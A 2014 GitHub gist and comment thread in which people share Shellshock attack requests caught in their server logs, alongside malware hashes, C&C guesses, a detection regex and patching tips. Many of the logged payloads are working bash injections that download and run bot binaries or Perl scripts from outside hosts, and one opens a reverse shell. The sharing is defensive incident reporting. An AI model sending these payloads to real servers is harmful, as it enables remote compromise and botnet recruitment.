Create a gist now

Instantly share code, notes, and snippets.

anonymous /gist:929d622f3b36b00c0be1 Secret
Created Sep 25, 2014

Embed
What would you like to do?
Ok, shits real. Its in the wild... src:162.253.66.76
GET./.HTTP/1.0
.User-Agent:.Thanks-Rob
.Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Host:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Referer:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Accept:.*/*
$ file nginx
nginx: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.18, stripped
$ md5sum nginx
5924bcc045bb7039f55c6ce29234e29a nginx
$ sha256sum nginx
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx
Looking at string variables, it appears to be a kernel exploit with a CnC component.
- found by @yinettesys
@aaronkaplan

This comment has been minimized.

Show comment
Hide comment
@aaronkaplan

aaronkaplan Sep 25, 2014

oh wow... thx Rob

aaronkaplan commented Sep 25, 2014

oh wow... thx Rob

@GelosSnake

This comment has been minimized.

Show comment
Hide comment
@GelosSnake

GelosSnake Sep 25, 2014

shit, good work

GelosSnake commented Sep 25, 2014

shit, good work

@IvRRimum

This comment has been minimized.

Show comment
Hide comment
@IvRRimum

IvRRimum commented Sep 25, 2014

🎱

@ssilaev

This comment has been minimized.

Show comment
Hide comment
@ssilaev

ssilaev commented Sep 25, 2014

omg

@w-flo

This comment has been minimized.

Show comment
Hide comment
@w-flo

w-flo Sep 25, 2014

This probably connects to 89.238.150.154:5 for C&C? Which sends a "PING", and probably expects "PONG!".

w-flo commented Sep 25, 2014

This probably connects to 89.238.150.154:5 for C&C? Which sends a "PING", and probably expects "PONG!".

@absynth

This comment has been minimized.

Show comment
Hide comment
@absynth

absynth Sep 25, 2014

Seems to connect to 108.162.197.26 which is a cloudflare IP.

absynth commented Sep 25, 2014

Seems to connect to 108.162.197.26 which is a cloudflare IP.

@horacio

This comment has been minimized.

Show comment
Hide comment
@horacio

horacio Sep 25, 2014

Holy bejesus.

horacio commented Sep 25, 2014

Holy bejesus.

@denartha

This comment has been minimized.

Show comment
Hide comment
@denartha

denartha Sep 25, 2014

Curl would be better. It comes natively in nearly everything, wget does not.

denartha commented Sep 25, 2014

Curl would be better. It comes natively in nearly everything, wget does not.

@unixfreaxjp

This comment has been minimized.

Show comment
Hide comment
@unixfreaxjp

unixfreaxjp Sep 25, 2014

Analysis of the ELF dropped I wrote in VT: https://www.virustotal.com/en/file/73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489/analysis/1411634118/ < see comment part. I open repo of this ELF malware family as Linux/Bash0day : http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3505#p23987
Thanks Yinettesys! good findings #MalwareMustDie!!

unixfreaxjp commented Sep 25, 2014

Analysis of the ELF dropped I wrote in VT: https://www.virustotal.com/en/file/73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489/analysis/1411634118/ < see comment part. I open repo of this ELF malware family as Linux/Bash0day : http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3505#p23987
Thanks Yinettesys! good findings #MalwareMustDie!!

@poggs

This comment has been minimized.

Show comment
Hide comment
@poggs

poggs Sep 25, 2014

Nice - the following text strings are in the binary:

root
admin
user
login
guest
toor
changeme
1234
12345
123456
default
pass
password

poggs commented Sep 25, 2014

Nice - the following text strings are in the binary:

root
admin
user
login
guest
toor
changeme
1234
12345
123456
default
pass
password

@mneimsky

This comment has been minimized.

Show comment
Hide comment
@mneimsky

mneimsky Sep 25, 2014

denartha you should send a note to the author.

mneimsky commented Sep 25, 2014

denartha you should send a note to the author.

@itiki

This comment has been minimized.

Show comment
Hide comment
@itiki

itiki commented Sep 25, 2014

OMG

@rfc1459

This comment has been minimized.

Show comment
Hide comment
@rfc1459

rfc1459 Sep 25, 2014

If I had to make an uneducated guess, I'd say this thing is a rush job to get a botnet up&running really fast (lack of obfuscation, section headers weren't stripped, and so on)

rfc1459 commented Sep 25, 2014

If I had to make an uneducated guess, I'd say this thing is a rush job to get a botnet up&running really fast (lack of obfuscation, section headers weren't stripped, and so on)

@Jamyn

This comment has been minimized.

Show comment
Hide comment
@Jamyn

Jamyn Sep 25, 2014

This should be interesting.

Jamyn commented Sep 25, 2014

This should be interesting.

@zhangran

This comment has been minimized.

Show comment
Hide comment
@zhangran

zhangran commented Sep 25, 2014

屌~~~

@unsignedzero

This comment has been minimized.

Show comment
Hide comment
@unsignedzero

unsignedzero commented Sep 25, 2014

Rob a hero!

@ABISprotocol

This comment has been minimized.

Show comment
Hide comment
@ABISprotocol

ABISprotocol Sep 25, 2014

Thanks Yinette and Rob, et. al.,
For those who made it here and have read the thread and are wondering what they should probably do right now, the best thing would likely be to update and upgrade (for starters).

This is done from your terminal.

Mac / OSX:
brew cleanup
brew update
brew upgrade
(That should do it... you may also wish to try to see what is outdated, with this:)
brew outdated

Debian / Ubuntu: sudo apt-get update && sudo apt-get upgrade
(Once that's done, please check again from your standard software updater tool)

Fedora / CentOS: You may want to read this thing first, maybe
https://fedoraproject.org/wiki/Upgrading_Fedora_using_yum#Upgrading_Fedora_using_yum_directly

PREPAAAAAARRRRE

ABISprotocol commented Sep 25, 2014

Thanks Yinette and Rob, et. al.,
For those who made it here and have read the thread and are wondering what they should probably do right now, the best thing would likely be to update and upgrade (for starters).

This is done from your terminal.

Mac / OSX:
brew cleanup
brew update
brew upgrade
(That should do it... you may also wish to try to see what is outdated, with this:)
brew outdated

Debian / Ubuntu: sudo apt-get update && sudo apt-get upgrade
(Once that's done, please check again from your standard software updater tool)

Fedora / CentOS: You may want to read this thing first, maybe
https://fedoraproject.org/wiki/Upgrading_Fedora_using_yum#Upgrading_Fedora_using_yum_directly

PREPAAAAAARRRRE

@ahollandECS

This comment has been minimized.

Show comment
Hide comment
@ahollandECS

ahollandECS Sep 25, 2014

Just saw this user-agent in the wild as well:
() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444

ahollandECS commented Sep 25, 2014

Just saw this user-agent in the wild as well:
() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444

@muloka

This comment has been minimized.

Show comment
Hide comment
@muloka

muloka Sep 25, 2014

@ABISprotocol re: OSX, that won't patch the system's bash. You have to compile bash yourself, follow these instructions if you want: http://apple.stackexchange.com/questions/146849/how-do-i-recompile-bash-to-avoid-the-remote-exploit-cve-2014-6271-and-cve-2014-7/146851#146851

muloka commented Sep 25, 2014

@ABISprotocol re: OSX, that won't patch the system's bash. You have to compile bash yourself, follow these instructions if you want: http://apple.stackexchange.com/questions/146849/how-do-i-recompile-bash-to-avoid-the-remote-exploit-cve-2014-6271-and-cve-2014-7/146851#146851

@bmurch

This comment has been minimized.

Show comment
Hide comment
@bmurch

bmurch Sep 25, 2014

Looks like someone is gathering a list:

grep '() { :;}' *

access_log:89.207.135.125 - - [25/Sep/2014:02:52:27 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"

bmurch commented Sep 25, 2014

Looks like someone is gathering a list:

grep '() { :;}' *

access_log:89.207.135.125 - - [25/Sep/2014:02:52:27 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"

@wilkinson

This comment has been minimized.

Show comment
Hide comment
@wilkinson

wilkinson Sep 25, 2014

I created a gist showing how to add a line to your bashrc to identify the presence of the vulnerability. This is useful to me because I work on many different servers with many different administrators, and I sync my bashrc across machines using Git. I would appreciate input!

wilkinson commented Sep 25, 2014

I created a gist showing how to add a line to your bashrc to identify the presence of the vulnerability. This is useful to me because I work on many different servers with many different administrators, and I sync my bashrc across machines using Git. I would appreciate input!

@4dd3r

This comment has been minimized.

Show comment
Hide comment
@4dd3r

4dd3r commented Sep 25, 2014

well that escalated qickly!

@rdev5

This comment has been minimized.

Show comment
Hide comment
@rdev5

rdev5 Sep 25, 2014

Caught one passing in as User Agent string at 14:34.

Reason: User header "HTTP_USER_AGENT" contains "() { :;}"

IP Address: 93.103.21.231
Hostname: 93-103-21-231.static.t-2.net
Location: Kranj, 52 (Slovenia)
User Agent: () { :;}; wget 'http://taxiairportpop.com/s.php?s=http://target.tld/'

rdev5 commented Sep 25, 2014

Caught one passing in as User Agent string at 14:34.

Reason: User header "HTTP_USER_AGENT" contains "() { :;}"

IP Address: 93.103.21.231
Hostname: 93-103-21-231.static.t-2.net
Location: Kranj, 52 (Slovenia)
User Agent: () { :;}; wget 'http://taxiairportpop.com/s.php?s=http://target.tld/'

@nicheath

This comment has been minimized.

Show comment
Hide comment
@nicheath

nicheath Sep 25, 2014

209.126.230.72 - - [25/Sep/2014:00:36:54 +0000] "GET / HTTP/1.0" 200 346 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
89.207.135.125 - - [25/Sep/2014:11:11:00 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 536 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
198.20.69.74 - - [25/Sep/2014:20:17:06 +0000] "GET / HTTP/1.1" 200 327 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"

Surely someone could come up with a creative script to run in place of ping. Maybe tweet the offending scanner IP address with #SHELLSHOCK hashtag.

nicheath commented Sep 25, 2014

209.126.230.72 - - [25/Sep/2014:00:36:54 +0000] "GET / HTTP/1.0" 200 346 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
89.207.135.125 - - [25/Sep/2014:11:11:00 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 536 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
198.20.69.74 - - [25/Sep/2014:20:17:06 +0000] "GET / HTTP/1.1" 200 327 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"

Surely someone could come up with a creative script to run in place of ping. Maybe tweet the offending scanner IP address with #SHELLSHOCK hashtag.

@Colbert337

This comment has been minimized.

Show comment
Hide comment
@Colbert337

Colbert337 Sep 26, 2014

wow,cool!THX!

Colbert337 commented Sep 26, 2014

wow,cool!THX!

@nate-kingsley

This comment has been minimized.

Show comment
Hide comment
@nate-kingsley

nate-kingsley Sep 26, 2014

Found another:

80.85.87.249 - - [25/Sep/2014:12:07:51 +0000] "GET /cgi-bin/hello HTTP/1.0" 404 290 "-" "() { :;}; /bin/bash -c "wget 82.220.38.36/r.txt -O /tmp/klogd""

nate-kingsley commented Sep 26, 2014

Found another:

80.85.87.249 - - [25/Sep/2014:12:07:51 +0000] "GET /cgi-bin/hello HTTP/1.0" 404 290 "-" "() { :;}; /bin/bash -c "wget 82.220.38.36/r.txt -O /tmp/klogd""

@chridd

This comment has been minimized.

Show comment
Hide comment
@chridd

chridd Sep 26, 2014

bmurch: shouldn't that be "grep '() {' *"? The colon doesn't have to be a colon for it to work.

chridd commented Sep 26, 2014

bmurch: shouldn't that be "grep '() {' *"? The colon doesn't have to be a colon for it to work.

@heyflynn

This comment has been minimized.

Show comment
Hide comment
@heyflynn

heyflynn Sep 26, 2014

109.202.102.224 - - [25/Sep/2014:09:44:58 -0500] "GET /cgi-bin/hello HTTP/1.0" 404 494 "-" "() { :;}; /bin/bash -c "cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur""

-- this one showed up a couple times on our servers today from netherlands. the source it pulls from http://213.5.67.223/jur has what looks to be a botnet with a worm component.

edit - looks like the 213.5.67.223 removed the exposed file. I have a copy of it, is there anyone in the security community I can send it to? there is some pretty scary looking shit in it. damn perl script has a built in port scanner, bot net tcp/udp flooders and spreader.

heyflynn commented Sep 26, 2014

109.202.102.224 - - [25/Sep/2014:09:44:58 -0500] "GET /cgi-bin/hello HTTP/1.0" 404 494 "-" "() { :;}; /bin/bash -c "cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur""

-- this one showed up a couple times on our servers today from netherlands. the source it pulls from http://213.5.67.223/jur has what looks to be a botnet with a worm component.

edit - looks like the 213.5.67.223 removed the exposed file. I have a copy of it, is there anyone in the security community I can send it to? there is some pretty scary looking shit in it. damn perl script has a built in port scanner, bot net tcp/udp flooders and spreader.

@realfx

This comment has been minimized.

Show comment
Hide comment
@realfx

realfx Sep 26, 2014

it work on android?

realfx commented Sep 26, 2014

it work on android?

@rdev5

This comment has been minimized.

Show comment
Hide comment
@rdev5

rdev5 Sep 26, 2014

Can anyone else confirm if this is a suitable intermediary fix whilst we wait for a more permanent fix?

akamai/bash@7caac6e

On OS X, I applied all the patches (http://ftp.gnu.org/gnu/bash/bash-4.3-patches/) and rebuilt bash 4.3 from source after making this change manually to variables.c and it appears to be working. Not able to reproduce the Bash bug vulnerability as such...

rdev5 commented Sep 26, 2014

Can anyone else confirm if this is a suitable intermediary fix whilst we wait for a more permanent fix?

akamai/bash@7caac6e

On OS X, I applied all the patches (http://ftp.gnu.org/gnu/bash/bash-4.3-patches/) and rebuilt bash 4.3 from source after making this change manually to variables.c and it appears to be working. Not able to reproduce the Bash bug vulnerability as such...

@ABISprotocol

This comment has been minimized.

Show comment
Hide comment
@ABISprotocol

ABISprotocol Sep 26, 2014

Somebody did this that supposedly works for both Mac / OSX and (all?) Linux variants, but test it yourself and have a go: https://shellshocker.net/

ABISprotocol commented Sep 26, 2014

Somebody did this that supposedly works for both Mac / OSX and (all?) Linux variants, but test it yourself and have a go: https://shellshocker.net/

@bacbos

This comment has been minimized.

Show comment
Hide comment
@bacbos

bacbos Sep 26, 2014

Same here, got different requests since yesterday morning: `[26/Sep/2014:09:10:11 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 401 652 "-" "() { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1""``

bacbos commented Sep 26, 2014

Same here, got different requests since yesterday morning: `[26/Sep/2014:09:10:11 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 401 652 "-" "() { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1""``

@UAHR

This comment has been minimized.

Show comment
Hide comment
@UAHR

UAHR Sep 26, 2014

198.101.206.138 also here:
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 1052 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
213.5.67.223 - - [25/Sep/2014:15:46:35 +0200]

...and this one:
"GET /cgi-bin/his HTTP/1.0" 404 1044 "-" "() { :;}; /bin/bash -c "cd /tmp;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur""

UAHR commented Sep 26, 2014

198.101.206.138 also here:
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 1052 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
213.5.67.223 - - [25/Sep/2014:15:46:35 +0200]

...and this one:
"GET /cgi-bin/his HTTP/1.0" 404 1044 "-" "() { :;}; /bin/bash -c "cd /tmp;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur""

@Cherrytreee

This comment has been minimized.

Show comment
Hide comment
@Cherrytreee

Cherrytreee Sep 26, 2014

A n00b question here:
If the logs show up as 404'd does it mean the UserAgent env were not actually evaluated - i.e. exploit failed ?

Cherrytreee commented Sep 26, 2014

A n00b question here:
If the logs show up as 404'd does it mean the UserAgent env were not actually evaluated - i.e. exploit failed ?

@ChrisMCMine

This comment has been minimized.

Show comment
Hide comment
@ChrisMCMine

ChrisMCMine Sep 26, 2014

@Cherrytreee do you have cgi scripts? If not then you're safe atm.

ChrisMCMine commented Sep 26, 2014

@Cherrytreee do you have cgi scripts? If not then you're safe atm.

@Cherrytreee

This comment has been minimized.

Show comment
Hide comment
@Cherrytreee

Cherrytreee commented Sep 26, 2014

@ChrisMCMine I don't. Thx!

@rdev5

This comment has been minimized.

Show comment
Hide comment
@rdev5

rdev5 Sep 26, 2014

More in the wild, though it looks like one of those "Is your site affected?" website scanners like shellshocker.net (if not for the remote file fetching). In this case, I wonder if it's necessarily a good idea for people to be creating "Check your website" online testers since it provides a proxy option for people with more malicious intent.

IP Address: 74.201.85.67
Location: Atlanta, GA 30303

http://target.tld:80/cgi-bin/test.sh
http://target.tld:80/cgi-bin/info.sh
http://target.tld:80/cgi-bin/test.sh
http://target.tld:80/cgi-bin/php.fcgi
http://target.tld:80/cgi-bin/php

User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"

Timestamp: 9/26/2014 8:39:45 AM

rdev5 commented Sep 26, 2014

More in the wild, though it looks like one of those "Is your site affected?" website scanners like shellshocker.net (if not for the remote file fetching). In this case, I wonder if it's necessarily a good idea for people to be creating "Check your website" online testers since it provides a proxy option for people with more malicious intent.

IP Address: 74.201.85.67
Location: Atlanta, GA 30303

http://target.tld:80/cgi-bin/test.sh
http://target.tld:80/cgi-bin/info.sh
http://target.tld:80/cgi-bin/test.sh
http://target.tld:80/cgi-bin/php.fcgi
http://target.tld:80/cgi-bin/php

User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"

Timestamp: 9/26/2014 8:39:45 AM
@ingie

This comment has been minimized.

Show comment
Hide comment
@ingie

ingie Sep 26, 2014

@UAHR
[25/Sep/2014:11:10:43 +0100] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 403 296 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
snap!

ingie commented Sep 26, 2014

@UAHR
[25/Sep/2014:11:10:43 +0100] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 403 296 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
snap!

@Neo23x0

This comment has been minimized.

Show comment
Hide comment
@Neo23x0

Neo23x0 Sep 27, 2014

I created a regex that matches the different attacks. (egrep compatible v4)

()\s{.;\s}\s*;

Examples:
http://rubular.com/r/FRoObXn9Kx

Neo23x0 commented Sep 27, 2014

I created a regex that matches the different attacks. (egrep compatible v4)

()\s{.;\s}\s*;

Examples:
http://rubular.com/r/FRoObXn9Kx

@ghost

This comment has been minimized.

Show comment
Hide comment
@ghost

ghost Sep 28, 2014

just discovered a new one in our server logs..

X.X.X.X - - [27/Sep/2014:06:18:02 +0200] "GET /de HTTP/1.0" 200 36399 "-" "() { :;}; /bin/bash -c \x22wget -q -O /dev/null http://ad.dipad.biz/test/http://customer-domain-censored.com/\x22""

ghost commented Sep 28, 2014

just discovered a new one in our server logs..

X.X.X.X - - [27/Sep/2014:06:18:02 +0200] "GET /de HTTP/1.0" 200 36399 "-" "() { :;}; /bin/bash -c \x22wget -q -O /dev/null http://ad.dipad.biz/test/http://customer-domain-censored.com/\x22""

@behindthefirewalls

This comment has been minimized.

Show comment
Hide comment
@behindthefirewalls

behindthefirewalls Sep 29, 2014

"() { :;}; /bin/bash -c "wget --delete-after http://remika.ru/userfiles/file/test.php\"

behindthefirewalls commented Sep 29, 2014

"() { :;}; /bin/bash -c "wget --delete-after http://remika.ru/userfiles/file/test.php\"

@addbook

This comment has been minimized.

Show comment
Hide comment
@addbook

addbook commented Sep 29, 2014

@blues-man

This comment has been minimized.

Show comment
Hide comment
@blues-man

blues-man Sep 29, 2014

Found this: "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.101/3333 0>&1'"

blues-man commented Sep 29, 2014

Found this: "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.101/3333 0>&1'"

@ghost

This comment has been minimized.

Show comment
Hide comment
@ghost

ghost Sep 30, 2014

and another one bites the dust..

62.210.75.170 - - [30/Sep/2014:00:13:28 +0200] "GET /de/cgi-mod/index.cgi HTTP/1.1" 404 315 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Y2Vuc29yZWQtZG9tYWluLmNvbVNoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Y2Vuc29yZWQtZG9tYWluLmNvbVNoZWxsU2hvY2tTYWx0 >> /dev/null'"

ghost commented Sep 30, 2014

and another one bites the dust..

62.210.75.170 - - [30/Sep/2014:00:13:28 +0200] "GET /de/cgi-mod/index.cgi HTTP/1.1" 404 315 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Y2Vuc29yZWQtZG9tYWluLmNvbVNoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Y2Vuc29yZWQtZG9tYWluLmNvbVNoZWxsU2hvY2tTYWx0 >> /dev/null'"

@Vic020

This comment has been minimized.

Show comment
Hide comment
@Vic020

Vic020 commented Oct 1, 2014

Great,

@clontarfx

This comment has been minimized.

Show comment
Hide comment
@clontarfx

clontarfx Oct 2, 2014

86.34.164.238 - - [28/Sep/2014:13:01:55 +0800] "GET / HTTP/1.0" 200 364 "-" "() { :;}; /bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh""

Seems fairly straight-forward.

clontarfx commented Oct 2, 2014

86.34.164.238 - - [28/Sep/2014:13:01:55 +0800] "GET / HTTP/1.0" 200 364 "-" "() { :;}; /bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh""

Seems fairly straight-forward.

@tarzand

This comment has been minimized.

Show comment
Hide comment
@tarzand

tarzand commented Oct 27, 2014

omg

@ofnothinghere

This comment has been minimized.

Show comment
Hide comment
@ofnothinghere

ofnothinghere Feb 18, 2017

it work on android?
gif

quotes

memes

wallpaper
thats fine

ofnothinghere commented Feb 18, 2017

it work on android?
gif

quotes

memes

wallpaper
thats fine

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment